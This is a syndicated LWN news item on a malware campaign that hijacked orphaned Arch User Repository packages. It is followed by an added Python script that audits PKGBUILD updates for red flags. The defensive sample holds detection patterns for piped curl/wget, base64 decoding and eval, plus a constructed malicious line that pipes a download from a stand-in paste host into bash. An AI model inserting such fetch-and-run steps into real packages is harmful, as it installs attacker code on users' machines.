Post Syndicated from jzb original https://lwn.net/Articles/1077619/
The Arch User Repository (AUR) has
been subjected to a sustained attack recently. The attacker, or attackers, have
spun up a series of new accounts and used them to adopt orphaned
packages and push malicious updates that would install malware on users' systems.
It is unclear how many users were compromised in the attack, but the maintainers
were playing Whac-A-Mole for several days to respond to each newly compromised
package. The project has turned
off the AUR’s new-user registration, for now, but it is unclear what its
long-term response will be or if the AUR can be secured without major changes to
its existing collaboration model.
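The attack above works because an AUR package is just a PKGBUILD that users build locally, so whoever holds the package can change its sources and build steps, and anyone who updates without reading the diff runs whatever was added. The practical defence on the user side is to review the PKGBUILD diff before building. What follows is an added example, not code from the article, from jzb, or from the AUR project: a small Python checker that compares the previously reviewed PKGBUILD with the newly fetched one and reports the signals a reviewer should look at first after a package changes hands. The host allowlist, the package name, the hosts and both PKGBUILD texts are constructed for the example (the new version bundles several red flags in one update so that every check fires); the `# Maintainer:` line is only a convention, so the maintainer check is advisory.

```python
"""Audit an AUR PKGBUILD update before building it.

Added example; not code from the LWN article or from the AUR project.
Package names, hosts, checksums and PKGBUILD contents are constructed.
"""
import re
from typing import Optional
from urllib.parse import urlparse

# Hosts the reviewer accepts as upstream for this package (assumption).
TRUSTED_HOSTS = {"github.com", "gitlab.com", "files.pythonhosted.org"}

# Shell idioms that fetch code from the network and run it, or hide it.
RISKY_PATTERNS = [
    r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b",
    r"\bbase64\s+(-d|--decode)\b",
    r"\beval\b",
]
VCS_PREFIX = re.compile(r"^(git|hg|svn|bzr|fossil)\+")


def parse_array(text: str, name: str) -> list:
    """Entries of a bash array assignment name=( ... ); quoted or bare
    words, comment lines skipped. Arch-specific variants such as
    source_x86_64 are not handled here."""
    entries = []
    for m in re.finditer(rf"^{name}=\((.*?)\)", text, re.S | re.M):
        body = re.sub(r"^\s*#.*$", "", m.group(1), flags=re.M)
        for q1, q2, bare in re.findall(r'"([^"]*)"|\'([^\']*)\'|(\S+)', body):
            val = q1 or q2 or bare
            if val:
                entries.append(val)
    return entries


def source_host(entry: str) -> Optional[str]:
    """Host a source entry downloads from; None for a local file.
    Strips the optional 'filename::' prefix and a VCS scheme prefix."""
    url = VCS_PREFIX.sub("", entry.split("::", 1)[-1])
    return urlparse(url).hostname


def maintainer(text: str) -> Optional[str]:
    m = re.search(r"^#\s*Maintainer:\s*(.+?)\s*$", text, re.M)
    return m.group(1) if m else None


def audit_update(old: str, new: str, trusted=TRUSTED_HOSTS) -> dict:
    """Compare two PKGBUILD texts and return findings keyed by check."""
    old_sources = set(parse_array(old, "source"))
    new_sources = parse_array(new, "source")
    sums = parse_array(new, "sha256sums")
    findings = {
        "new_sources": [e for e in new_sources if e not in old_sources],
        "untrusted_hosts": [],      # new sources on hosts outside the allowlist
        "unverified_sources": [],   # new non-VCS sources whose checksum is SKIP
        "risky_commands": [],       # added lines matching RISKY_PATTERNS
        "maintainer_changed": maintainer(old) != maintainer(new),
    }
    for e in findings["new_sources"]:
        host = source_host(e)
        if host and host not in trusted:
            findings["untrusted_hosts"].append(host)
    for e, s in zip(new_sources, sums):
        if s == "SKIP" and e in findings["new_sources"] \
                and not VCS_PREFIX.match(e.split("::", 1)[-1]):
            findings["unverified_sources"].append(e)
    old_lines = {l.strip() for l in old.splitlines()}
    for line in new.splitlines():
        if line.strip() not in old_lines and any(re.search(p, line) for p in RISKY_PATTERNS):
            findings["risky_commands"].append(line.strip())
    findings["needs_review"] = any(bool(v) for v in findings.values())
    return findings


# Constructed sample: the PKGBUILD as last reviewed by the user.
OLD_PKGBUILD = """\
# Maintainer: Alice Example <alice@example.org>
pkgname=example-tool
pkgver=1.4.0
pkgrel=1
arch=('x86_64')
url="https://github.com/example/example-tool"
license=('MIT')
source=("$pkgname-$pkgver.tar.gz::https://github.com/example/example-tool/archive/v$pkgver.tar.gz")
sha256sums=('e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855')

package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
"""

# Constructed sample: the same package after adoption by a new account.
NEW_PKGBUILD = OLD_PKGBUILD.replace(
    "# Maintainer: Alice Example <alice@example.org>",
    "# Maintainer: newuser123 <newuser@example.net>",
).replace("pkgrel=1", "pkgrel=2").replace(
    'v$pkgver.tar.gz")',
    'v$pkgver.tar.gz"\n        "helper.sh::https://paste.example.invalid/raw/abc123")',
).replace("b855')", "b855'\n            'SKIP')").replace(
    '  make DESTDIR="$pkgdir" install\n',
    '  make DESTDIR="$pkgdir" install\n  curl -fsSL https://paste.example.invalid/raw/abc123 | bash\n',
)

if __name__ == "__main__":
    import json
    print(json.dumps(audit_update(OLD_PKGBUILD, NEW_PKGBUILD), indent=2))
```

The check is deliberately a triage aid rather than a verdict: a clean report still means the diff has to be read, because a package that changes hands can also carry the payload in a `.install` hook, in a patch file shipped alongside the PKGBUILD, or inside a new source tarball whose checksum was updated to match. The authoritative maintainer for a package is the one shown on its AUR page, not the comment at the top of the file, so a maintainer comparison against what the AUR reports is the stronger signal.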